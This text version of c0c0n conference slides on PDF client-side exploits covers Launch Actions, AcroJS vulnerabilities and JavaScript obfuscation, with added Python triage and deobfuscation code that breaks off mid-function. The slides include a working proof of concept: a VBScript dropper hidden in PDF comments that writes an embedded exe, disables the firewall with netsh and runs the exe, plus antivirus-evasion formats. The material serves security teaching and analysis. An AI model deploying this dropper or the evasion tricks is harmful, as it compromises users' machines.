Client Side Exploits using PDF
![Page 1: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/1.jpg)
By:
Ankur Bhargava (Infosys Technologies Limited)
Tamaghna Basu (Security Researcher)
Client Side Exploits using PDF
C0C0N Security & Hacking Conference
![Page 2: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/2.jpg)
Contents
About PDF
Launch Action
Exploits
AcroJs Exploits
Road Ahead
Tools and References
![Page 3: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/3.jpg)
About PDF
• What is PDF?
• Incidents in the wild
• Why PDF attacks?
• PDF document structure
![Page 4: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/4.jpg)
Potentially Dangerous File / Penetration Document Format
Stands for Adobe Portable Document Format
Makes the exchange and manipulation of electronic data reliable and platform independent
Has become the most widespread document description format in the world
![Page 5: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/5.jpg)
Adobe PDF – As a programming language
A PDF document is more than a powerful document format
Has a complete programming language of its own
Dedicated to document creation and manipulation
Relatively strong execution features
![Page 6: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/6.jpg)
Adobe PDF – Security Issues
![Page 7: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/7.jpg)
2010: Still Continuing…
![Page 8: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/8.jpg)
2010: Still Continuing… (March, April, May, June)
![Page 9: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/9.jpg)
Incidents in the wild
| Date | CVE | Type | Lure |
|---|---|---|---|
| Jun 14 | CVE-2010-1297 | PDF | Adobe 0-Day WEO from [email protected] |
| Jun 20 | CVE-2010-1297 | PDF | Meeting agenda from [email protected] |
| Jun 21 | CVE-2010-1297 | PDF | About the recent US-Japan Economic Relations |
| Jun 21 | CVE-2010-1297 | PDF | Adobe 0-Day About the recent US-Japan Economic Relations - with Poison Ivy |
| Jun 27 | CVE-2009-0927 | PDF | Discussion on cross-strait maritime cooperation |
| Jul 6 | CVE-2010-1297 | PDF | EPA's Water Sampling Report from spoofed [email protected] |
| Jul 14 | CVE-2009-4324 | PDF | President Obama's Detrimental Deadlines |
![Page 10: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/10.jpg)
The Reign of Zeus:
Zeus (also known as Zbot, PRG, Wsnpoem, Gorhax and Kneber) is a Trojan horse that steals banking information by keystroke logging.
Found in July 2007 when it was used to steal information from the United States Department of Transportation. It became more widespread in March 2009.
In June 2009, security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of companies like: Bank of America, NASA, Monster, ABC, Oracle, Cisco, Amazon, BusinessWeek
ZeuS is sold in the criminal underground as a kit for around $3000-$4000 and is likely the malware most used by criminals specializing in financial fraud. ZeuS has evolved over time and includes a full arsenal for information stealing.
![Page 11: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/11.jpg)
The Reign of Zeus
A recent breakthrough in spreading Zeus via PDF files threatens to spread it even further. The PDF file (detected as Exploit.JS.Pdfka.bui) contained an exploit for CVE-2010-0188, a buffer overflow that manifests itself when the field containing the image is accessed.
CVE-2010-0188 exploit statistics, 2010
![Page 12: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/12.jpg)
Popular in malwaredomainlist.com
![Page 13: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/13.jpg)
Apple iPhone / iPad / iPod Code Execution and Sandbox Bypass
VUPEN ID - VUPEN/ADV-2010-1992
Release date - 2010-08-03
It is caused by a memory corruption error when processing Compact Font Format (CFF) data within a PDF document, which could be exploited by attackers to execute arbitrary code by tricking a user into visiting a specially crafted web page using Mobile Safari.
![Page 14: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/14.jpg)
Why PDF
Popularity and usability
Flexibility, platform independence, rich text
High trust level: a PDF is seen as a static piece of information
Rich API, easy to exploit or misuse
Dominance of Adobe Reader, hence a huge scope for attack
![Page 15: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/15.jpg)
PDF document structure
The general structure of a PDF file is composed of the following components: header, body, cross-reference (xref) table, and trailer, as shown in figure 1.
![Page 16: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/16.jpg)
PDF Document Structure
(figure: PDF Header, Body containing the Objects, Cross-reference Table, Trailer)
![Page 17: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/17.jpg)
Launch Action
• Launch Action API
• Some examples
• Evading antivirus
• With embedded EXE
![Page 18: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/18.jpg)
Launch Action Vulnerability
A launch action launches an application or opens or prints a document. Following are the action dictionary entries specific to this type of action.
ENTRIES
S : name (Required) The type of action that this dictionary describes; shall be Launch for a launch action.
F : file specification (Required if none of the entries Win, Mac, or Unix is present) The application that shall be launched or the document that shall be opened or printed. If this entry is absent and the conforming reader does not understand any of the alternative entries, it shall do nothing.
Win : dictionary (Optional) A dictionary containing Windows-specific launch parameters.
![Page 19: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/19.jpg)
Launch Action Vulnerability
PARAMETERS (entries of the Win dictionary)
F : byte string (Required) The file name of the application that shall be launched or the document that shall be opened or printed, in standard Windows pathname format. If the name string includes a backslash character (\), the backslash shall itself be preceded by a backslash. This value shall be a simple string; it is not a file specification.
P : byte string (Optional) A parameter string that shall be passed to the application designated by the F entry. This entry shall be omitted if F designates a document.
![Page 20: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/20.jpg)
Launch Action Vulnerability
Examples: open the command prompt; open a website
![Page 21: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/21.jpg)
Launch Action Vulnerability
Open notepad.exe
![Page 22: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/22.jpg)
Launch Action Vulnerability
![Page 23: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/23.jpg)
Launch Action Vulnerability
Changing the message
![Page 24: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/24.jpg)
Launch Action Vulnerability
Confidential Data!! If You are Authorized Click on 'Open'. Check 'Do Not Show This Message Again' to avoid this dialog next time
![Page 25: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/25.jpg)
Launch Action Vulnerability
![Page 26: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/26.jpg)
Launch Action in 9.3.3
![Page 27: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/27.jpg)
Launch Action Vulnerability
![Page 28: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/28.jpg)
Evading Antivirus by Changing the format
You can take any other PDF data type and give it a number by wrapping it in "obj" and "endobj". Then later on, when you want to use that chunk of data, you can reference it, by number, with the "R" operator.
These two forms are equivalent to Acrobat:

```
2 0 obj
(Hello World)
endobj
3 0 obj
<< /Example 2 0 R >>
endobj
```

```
3 0 obj
<< /Example (Hello World) >>
endobj
```
![Page 29: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/29.jpg)
Evading Antivirus
What you can leave out:
• All page data
• All whitespace, except for the end-of-line after comments
• The version number part of %PDF-1.1
• The %%EOF
• The xref table, and thus also startxref
• Most object /Types

So what's actually required?
• %PDF-anything, but if the file is too confusing for Acrobat you need at least the first number, like %PDF-1.
• A trailer with a /Root dictionary for the Catalog
• A /Pages dictionary, which can be empty as long as it is a dictionary type
• An /OpenAction if you want to launch your JavaScript upon file open
• The JavaScript action
![Page 30: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/30.jpg)
Evading Antivirus
```
%PDF-1.trailer<</Root<</Pages<<>>/OpenAction<</S/Launch/Win<</F(cmd.exe)/P<0A0A0A0A0A0A0A0A4E6F74653A2054686973206973206120736563757265205044462E20546F207669657720746865207365637572656420636F6E74656E7420706C6561736520636C69636B2074686520224F70656E2220627574746F6E2062656C6F772E>>>>>>>>>
```
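The scanner below is an added example and not code from the talk; it works in the spirit of pdfid.py, the tool the case study later uses. It walks the file for `N G obj ... endobj` and `trailer` instead of trusting the xref table, so a trailer-only file like the one above is triaged the same way as a well-formed one; it undoes `#xx` escapes inside names, decodes hex strings such as the `/P` parameter, and follows `N G R` references so that the two equivalent spellings of an object shown earlier report identically. Both input files are constructed for this example (the `/P` text is a placeholder, not the slide's message), and every function and variable name is the example's own.

```python
"""pdfid-style triage of a PDF without trusting its xref table (added example)."""
import re

OBJ = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
STREAM = re.compile(rb"^(.*?)stream\r?\n(.*?)\nendstream", re.S)
REF = re.compile(rb"(\d+)\s+\d+\s+R\b")
HEXSTR = re.compile(rb"<([0-9A-Fa-f][0-9A-Fa-f\s]*)>")
NAME_ESC = re.compile(rb"#([0-9A-Fa-f]{2})")
KEYWORDS = [b"/OpenAction", b"/AA", b"/Launch", b"/JavaScript", b"/JS", b"/EmbeddedFile", b"/RichMedia"]

# Constructed sample 1: the trailer-only shape from the slide (no xref, no %%EOF, empty
# /Pages). Its /P hex string decodes to a placeholder text, not the slide's message.
MINIMAL_LAUNCH = (
    b"%PDF-1.trailer<</Root<</Pages<<>>/OpenAction<</S/Launch/Win<</F(cmd.exe)"
    b"/P<0A0A4E6F74653A20636F6E737472756374656420706C616365686F6C646572>" + b">>" * 4
)
# Constructed sample 2: ordinary objects, /OpenAction given as an indirect reference,
# the action type hex-escaped as /Java#53cript, the script kept in a separate stream.
_JS = b'app.alert("constructed sample");'
OBJECT_JS = (
    b"%PDF-1.4\n"
    b"1 0 obj<</Type/Catalog/Pages 2 0 R/OpenAction 3 0 R>>endobj\n"
    b"2 0 obj<</Type/Pages/Kids[]/Count 0>>endobj\n"
    b"3 0 obj<</S/Java#53cript/JS 4 0 R>>endobj\n"
    b"4 0 obj<</Length " + str(len(_JS)).encode() + b">>stream\n" + _JS
    + b"\nendstream\nendobj\ntrailer<</Root 1 0 R>>\n%%EOF\n"
)


def unescape_names(text):
    """Undo #xx escapes inside names (/Java#53cript -> /JavaScript), as pdfid does."""
    return NAME_ESC.sub(lambda m: bytes([int(m.group(1), 16)]), text)


def load_objects(data):
    """Object number -> (dictionary, raw stream or None), found by scanning, not via xref."""
    objects = {}
    for num, _gen, body in OBJ.findall(data):
        s = STREAM.match(body)
        objects[int(num)] = (unescape_names(s.group(1)), s.group(2)) if s else (unescape_names(body), None)
    return objects


def read_literal(text, start):
    """Content of the literal string whose '(' is at text[start]; honours \\ escapes and nesting."""
    depth, i, out = 0, start, bytearray()
    while i < len(text):
        c = text[i:i + 1]
        if c == b"\\":                      # escaped byte is taken verbatim
            out += text[i + 1:i + 2]
            i += 2
            continue
        depth += (c == b"(") - (c == b")")
        if depth == 0:                      # the matching close paren
            break
        if not (c == b"(" and depth == 1):  # the opening paren is not content
            out += c
        i += 1
    return bytes(out)


def value_of(dictionary, key, objects):
    """Value after `key`: literal string, hex string, name, or a resolved 'N G R' reference."""
    m = re.search(re.escape(key) + rb"(?![A-Za-z0-9])\s*", dictionary)
    if not m:
        return None
    i = m.end()
    if dictionary.startswith(b"(", i):
        return read_literal(dictionary, i)
    h = HEXSTR.match(dictionary, i)
    if h:
        digits = re.sub(rb"\s", b"", h.group(1))
        return bytes.fromhex((digits + b"0" * (len(digits) % 2)).decode())
    r = REF.match(dictionary, i)
    if r:                                   # indirect object: use its stream if it has one
        target, stream = objects.get(int(r.group(1)), (b"", None))
        return stream if stream is not None else target
    n = re.match(rb"/[^\s/<>\[\]()]+", dictionary[i:])
    return n.group(0) if n else None


def scan(data):
    """Keyword counts plus decoded /Launch targets and JavaScript, like a pdfid run."""
    objects = load_objects(data)
    dictionaries = [d for d, _ in objects.values()]
    if b"trailer" in data:                  # a trailer-only file has no objects at all
        dictionaries.append(unescape_names(data[data.find(b"trailer"):]))
    report = {"objects": len(objects), "has_xref": b"xref" in data, "has_eof": b"%%EOF" in data,
              "keywords": {k.decode(): sum(d.count(k) for d in dictionaries) for k in KEYWORDS},
              "launch": [], "javascript": []}
    for d in dictionaries:
        if b"/Launch" in d:
            f, p = value_of(d, b"/F", objects), value_of(d, b"/P", objects)
            report["launch"].append({"F": f.decode("latin-1") if f else None,
                                     "P": p.decode("latin-1") if p else None})
        if re.search(rb"/JS(?![A-Za-z0-9])", d):
            js = value_of(d, b"/JS", objects)
            if js:
                report["javascript"].append(js.decode("latin-1"))
    return report
```

Call `scan()` on the bytes of a suspicious file: the `launch` entries show the decoded `/F` target and `/P` parameter (where the dialog text from the earlier slides would appear), `javascript` shows the script as the reader would compile it, and the `has_xref`/`has_eof` flags make the "what you can leave out" tricks visible at a glance.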
![Page 31: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/31.jpg)
Evading Antivirus
![Page 32: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/32.jpg)
POC: Launching an Embedded exe
Step 1 : Embed the hex content of the exe in a VBScript which writes it out to the file system and runs it.
Step 2 : Embed that VBScript in the PDF file as comments.
Step 3 : Launch cmd.exe and create another script which extracts the main VBScript from the PDF and runs them both.
![Page 33: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/33.jpg)
Step 1 : Embed the hex content of the exe in a vbscript
```vbscript
Dim b,bl
Function c(d)
c=chr(d)
End Function
b=Array(c(77),c(90),c(144),c(0),c(3),c(0),c(0)....,"")
bl = 3072
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile("helpme.exe", 2, True)
For i = 0 To bl
f.write(b(i))
Next
f.close()
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "netsh firewall set opmode disable", 0, True
WshShell.Run "helpme.exe", 0, False
WshShell.Run "taskkill /IM cmd.exe /F", 0, False
```
Hex content of the exe as a character array
![Page 34: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/34.jpg)
Step 2 : Embed the vbscript in the pdf file as comments
```
%'SS%Dim b,bl;Set WshShell = Function c(d);c=chr(d);End Function;b=Array(c(77),c(90),c(144),c(0),.....,"");bl = 3072;Set fso = CreateObject("Scripting.FileSystemObject");Set f = fso.OpenTextFile("helpme.exe", 2, True);For i = 0 To bl;f.write(b(i));Next;f.close(); Set WshShell = WScript.CreateObject("WScript.Shell") ;WshShell.Run "netsh firewall set opmode disable", 0, True;WshShell.Run "helpme.exe", 0, False;WshShell.Run "taskkill /IM cmd.exe /F", 0, False%'EE
6 0 obj[/PDF /Text]endobj
```
![Page 35: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/35.jpg)
Step 3 : Launch cmd.exe and create another script
```
/c echo Set fso=CreateObject("Scripting.FileSystemObject") > execute.vbs && echo Set f=fso.OpenTextFile("EmbeddedExePoC.pdf", 1, True) >> execute.vbs && echo pf=f.ReadAll >> execute.vbs && echo s=InStr(pf,"'SS") >> execute.vbs && echo e=InStr(pf,"'EE") >> execute.vbs && echo s=Mid(pf,s,e-s) >> execute.vbs && echo Set z=fso.OpenTextFile("toexecute.vbs", 2, True) >> execute.vbs && echo s = Replace(s,"%","") >> execute.vbs && echo s = Replace(s,";",vbcrlf) >> execute.vbs && echo z.Write(s) >> execute.vbs && execute.vbs && toexecute.vbs
```
![Page 36: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/36.jpg)
Generated VBScript
```vbscript
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.OpenTextFile("EmbeddedExePoC.pdf", 1, True)
pf=f.ReadAll
s=InStr(pf,"'SS")
e=InStr(pf,"'EE")
s=Mid(pf,s,e-s)
Set z=fso.OpenTextFile("toexecute.vbs", 2, True)
s = Replace(s,"%","")
s = Replace(s,";",vbcrlf)
z.Write(s)
```
![Page 37: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/37.jpg)
AcroJS
• AcroJS API
• Vulnerable APIs
• Obfuscation techniques
• Case study
![Page 38: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/38.jpg)
AcroJS
• Acrobat JavaScript is the cross-platform scripting language of the Adobe® Acrobat® family of products.
• Through JavaScript extensions, the viewer application and its plug-ins expose much of their functionality to document authors, form designers, and plug-in developers.
• This functionality includes the following features:
– Processing forms within the document
– Batch processing collections of PDF documents
– Developing and maintaining online collaboration schemes
– Communicating with local databases
– Controlling multimedia events
![Page 39: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/39.jpg)
JavaScript Actions
• A JavaScript action causes a script to be compiled and executed by the JavaScript interpreter.
• Depending on the nature of the script, various interactive form fields in the document may update their values or change their visual appearances.
PARAMETERS
/S : name (Required) The type of action that this dictionary describes; must be JavaScript for a JavaScript action.
/JS : text string or text stream (Required) A text string or text stream containing the JavaScript script to be executed.
![Page 40: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/40.jpg)
AcroJS examples: launchURL, alert box
![Page 41: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/41.jpg)
Acrojs examples
![Page 42: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/42.jpg)
Acrojs examples
![Page 43: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/43.jpg)
Vulnerable APIs
• getIcon() [CVE-2009-0927]
– Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3, and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object, a different vulnerability than CVE-2009-0658.
• util.printf() [CVE-2008-2992] [CVE-2008-1104]
– Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104.
– Stack-based buffer overflow in Foxit Reader before 2.3 build 2912 allows user-assisted remote attackers to execute arbitrary code via a crafted PDF file, related to the util.printf JavaScript function and floating point specifiers in format strings.
![Page 44: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/44.jpg)
Vulnerable APIs
• getAnnots() [CVE-2009-1492]
– The getAnnots Doc method in the JavaScript API in Adobe Reader and Acrobat 9.1, 8.1.4, 7.1.1, and earlier allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that contains an annotation, and has an OpenAction entry with JavaScript code that calls this method with crafted integer arguments.
• customDictionaryOpen() [CVE-2009-1493]
– The customDictionaryOpen spell method in the JavaScript API in Adobe Reader 9.1, 8.1.4, 7.1.1, and earlier on Linux and UNIX allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that triggers a call to this method with a long string in the second argument.
![Page 45: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/45.jpg)
Vulnerable APIs
• Doc.media.newPlayer [CVE-2009-4324]
– Use-after-free vulnerability in the Doc.media.newPlayer method in Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted PDF file using ZLib compressed streams, as exploited in the wild in December 2009.
• Collab.collectEmailInfo [CVE-2007-5659]
– Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods. NOTE: this issue might be subsumed by CVE-2008-0655.
![Page 46: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/46.jpg)
Obfuscation Techniques
Why?
• To make analysis more difficult
• To avoid detection by virus scanners
Ways?
• Using JavaScript obfuscation
• Using PDF obfuscations (filters)
![Page 47: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/47.jpg)
Javascript Obfuscations : Unlearn Coding Ethics
![Page 48: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/48.jpg)
Distorting format
Normal code:

```javascript
function execute(data, time) {
  Timelag = 5000;
  if (time > Timelag) {
    // some code
  }
}

function overflow(hex, loop) {
  for (i = 0; i < loop; i++) {
    hex = hex + hex;
  }
}
```

Obfuscated code (all formatting removed):

```javascript
function execute(data,time){Timelag=5000;if(time>Timelag){/* some code */}}function overflow(hex,loop){for(i=0;i<loop;i++){hex=hex+hex;}}
```
![Page 49: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/49.jpg)
Obfuscating Identifiers
Normal code:

```javascript
function execute(data, time) {
  Timelag = 5000;
  if (time > Timelag) {
    // some code
  }
}

function overflow(hex, loop) {
  for (i = 0; i < loop; i++) {
    hex = hex + hex;
  }
}
```

Obfuscated code:

```javascript
function aeiou(lIlIIlI, O0OOOO0OO000OO){WWMWMWMWMWMW=5000;if (O0OOOO0OO000OO > WWMWMWMWMWMW){/* some code */}}
function aimpq(xxwmnnx, pqrtxw){for (dqweaa=0; dqweaa < pqrtxw; dqweaa ++){xxwmnnx = xxwmnnx + xxwmnnx;}}
```
![Page 50: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/50.jpg)
Obfuscating Identifiers – Even Worse
Differentiating identifiers only by the number of underscore characters:

```javascript
function _____(____,__________){
______________=5000;if (__________>______________){
// some code
}
}function ___(_______, ______){
for(________________=0; ________________<______; ________________ ++)
{_______ = _______ + _______;
}}
```
![Page 51: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/51.jpg)
Obfuscating Identifiers – Even Worse
Differentiating identifiers only by the number of underscore characters, on a single line:

```javascript
function _____(____,__________){______________=5000;if (__________>______________){/* some code */}}function ___(_______, ______){for(________________=0; ________________<______; ________________ ++){_______ = _______ + _______;}}
```
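One analyst-side counterpart to the identifier tricks above, as an added example rather than code from the talk: a Python pass that maps every identifier that is not a JavaScript keyword or a known Acrobat/global API name to id1, id2, ... in order of first appearance, leaving string literals and comments untouched, and lets the analyst pre-seed meaningful names once a function's role is understood. The keyword and API lists are deliberately short assumptions, and the two inputs are constructed transcriptions of the slides' samples (the comment is a block comment so the one-line form stays valid JavaScript).

```python
"""Consistent renaming of obfuscated JavaScript identifiers (added example, not from the talk)."""
import re

JS_KEYWORDS = {"function", "for", "if", "else", "var", "return", "while", "do", "new",
               "this", "true", "false", "null", "typeof", "in", "break", "continue"}
# Names that must survive renaming or the script breaks: Acrobat's app object and a
# few common globals (an assumed, deliberately short list; extend it per sample).
KNOWN_API = {"app", "alert", "eval", "String", "fromCharCode", "length", "charCodeAt",
             "unescape", "arguments", "callee", "toString", "Math", "Array"}
IDENT = re.compile(r"[A-Za-z_$][\w$]*")
# String literals and comments are copied through untouched.
SKIP = re.compile(r"'(?:\\.|[^'\\])*'|\"(?:\\.|[^\"\\])*\"|//[^\n]*|/\*.*?\*/", re.S)

# Constructed inputs mirroring the slides' samples.
UNDERSCORE_SAMPLE = ("function _____(____,__________){______________=5000;"
                     "if (__________>______________){/* some code */}}\n"
                     "function ___(_______, ______){for(________________=0; ________________<______;"
                     " ________________ ++){_______ = _______ + _______;}}")
LOOKALIKE_SAMPLE = ("function aeiou(lIlIIlI, O0OOOO0OO000OO){WWMWMWMWMWMW=5000;"
                    "if (O0OOOO0OO000OO > WWMWMWMWMWMW){/* some code */}}")


def rename_identifiers(code, names=None):
    """Return (rewritten code, mapping). `names` pre-seeds obfuscated -> meaningful names;
    every other unknown identifier gets id1, id2, ... in order of first appearance."""
    mapping = dict(names or {})

    def rename(match):
        name = match.group(0)
        if name in JS_KEYWORDS or name in KNOWN_API:
            return name
        if name not in mapping:
            mapping[name] = f"id{len(mapping) + 1}"
        return mapping[name]

    out, pos = [], 0
    for skip in SKIP.finditer(code):            # rename only the code between skipped spans
        out.append(IDENT.sub(rename, code[pos:skip.start()]))
        out.append(skip.group(0))
        pos = skip.end()
    out.append(IDENT.sub(rename, code[pos:]))
    return "".join(out), mapping
```

The returned mapping is the analyst's worksheet: once `id1` turns out to be the function that builds the heap spray, re-run with `names={"_____": "spray"}` and the rest of the numbering stays stable.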
![Page 52: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/52.jpg)
Chain of Eval
Normal code:

```javascript
app.alert("c0c0n");
```

Obfuscated code (each layer resolves to the next one):

```javascript
func = eval;                          // a reference to eval, hidden behind another name
one = '\'app.alert("c0c0n")\'';       // a string whose value is another string literal
two = eval(one);                      // two === 'app.alert("c0c0n")'
three = "two";                        // the name of the variable holding the payload
eval(func(three));                    // func(three) yields the payload string, eval runs it
```
![Page 53: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/53.jpg)
Splitting Javascript
Normal code:

```javascript
app.alert("hello world");
```

Obfuscated code (the statement is reassembled from fragments, then run through eval):

```javascript
Rt=");";Td="ert(\"hel";Ab="ap";Qw="ld\"";Kg="p.al";Gh="lo wor";eval("hh=Ab+Kg+Td+Gh+Qw+Rt");eval(hh);
```
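The chain-of-eval and string-splitting samples above can be folded without a JavaScript engine, which is how an analyst surfaces a payload without running it. The folder below is an added example, not code from the talk: it models only string literals, assignments, `+` concatenation, bare identifiers and calls to `eval` (directly or through an alias), and reports every statement it cannot fold as what the engine would finally execute. The two inputs are constructed transcriptions of the slides' samples with straight quotes and lower-case `eval`; names such as `Opaque`, `split_top` and `deobfuscate` are the example's own.

```python
"""Static folding of split-string and eval-chain obfuscation (added example, not from the talk)."""
import re

EVAL = object()                      # sentinel standing in for JavaScript's eval function
STRING_LIT = re.compile(r"""^(?:'(?:\\.|[^'\\])*'|"(?:\\.|[^"\\])*")$""", re.S)
NAME = re.compile(r"^[A-Za-z_$][\w$]*$")
CALL = re.compile(r"^([A-Za-z_$][\w$]*)\((.*)\)$", re.S)
ASSIGN = re.compile(r"^([A-Za-z_$][\w$]*)\s*=(?!=)\s*(.+)$", re.S)

# Constructed transcriptions of the two slides (straight quotes, lower-case eval).
SPLIT_SAMPLE = r'''Rt=");";Td="ert(\"hel";Ab="ap";Qw="ld\"";Kg="p.al";Gh="lo wor";eval("hh=Ab+Kg+Td+Gh+Qw+Rt");eval(hh);'''
EVAL_CHAIN_SAMPLE = r"""func=eval;one='\'app.alert("c0c0n")\'';two=eval(one);three="two";eval(func(three));"""


class Opaque(Exception):
    """Code the folder does not model; the statement is reported instead of evaluated."""


def split_top(text, sep):
    """Split on `sep` outside string literals and parentheses, so the ';' in ");" is safe."""
    parts, buf, quote, depth, i = [], [], None, 0, 0
    while i < len(text):
        ch = text[i]
        if quote:
            buf.append(ch)
            if ch == "\\" and i + 1 < len(text):      # keep an escaped char with its backslash
                buf.append(text[i + 1])
                i += 1
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
            buf.append(ch)
        elif ch == sep and depth == 0:
            parts.append("".join(buf))
            buf = []
        else:
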